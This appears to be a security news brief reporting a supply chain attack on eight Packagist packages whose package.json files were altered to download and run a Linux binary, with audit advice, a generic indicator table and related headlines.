Packagist Supply Chain Attack Infects 8 Packages with Linux Malware
A new, coordinated supply chain attack has compromised eight packages on Packagist. The attack injects malicious code designed to retrieve and execute a Linux binary hosted on GitHub Releases. This isnβt a typical composer.json compromise; The Hacker News reports that the malicious code was inserted into package.json files, specifically targeting projects that incorporate JavaScript components.
This vector is critical. Attackers are shifting their focus to broader supply chain points beyond traditional package managers. By targeting package.json, they aim for projects that bundle JavaScript, expanding their reach to a different set of development workflows and environments. This shows a clear intent to maximize impact by leveraging the widespread use of JavaScript in modern applications, even if the primary package manager is Composer.
What This Means For You
- If your development pipeline uses Composer and incorporates JavaScript packages, you need to audit your `package.json` files immediately. Check for any unauthorized modifications or suspicious entries that could fetch external binaries. This isn't just about Composer anymore; it's about the entire dependency tree. Assume compromise and validate every external dependency.
π‘οΈ Detection Rules
2 rules Β· 6 SIEM formats2 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free β export to any SIEM format via the Intel Bot.
Traffic to Compromised Vendor β Packagist
Indicators of Compromise
| ID | Type | Indicator |
|---|---|---|
| Packagist-Supply-Chain-Attack-2026-05 | Supply Chain Attack | Packagist packages |
| Packagist-Supply-Chain-Attack-2026-05 | Code Injection | Malicious code inserted into package.json |
| Packagist-Supply-Chain-Attack-2026-05 | Malware | Linux binary retrieved from GitHub Releases URL |
Written by SCW Vulnerability Desk
Related coverage on
npm Boosts Supply Chain Security with 2FA-Gated Staged Publishing
GitHub has rolled out new controls for npm, significantly enhancing software supply chain security. The Hacker News reports that these features, now generally available, introduce...
Anthropic AI Finds 10,000 High-Severity Flaws in Critical Software
Anthropic's Project Glasswing, an AI-driven cybersecurity initiative, has reportedly uncovered over 10,000 high- or critical-severity vulnerabilities in globally significant software. The Hacker News reports that...
Laravel-Lang PHP Packages Compromised with Cross-Platform Credential Stealer
The Hacker News reports a significant software supply chain attack targeting multiple PHP packages under the Laravel-Lang project. Attackers compromised these packages to distribute a...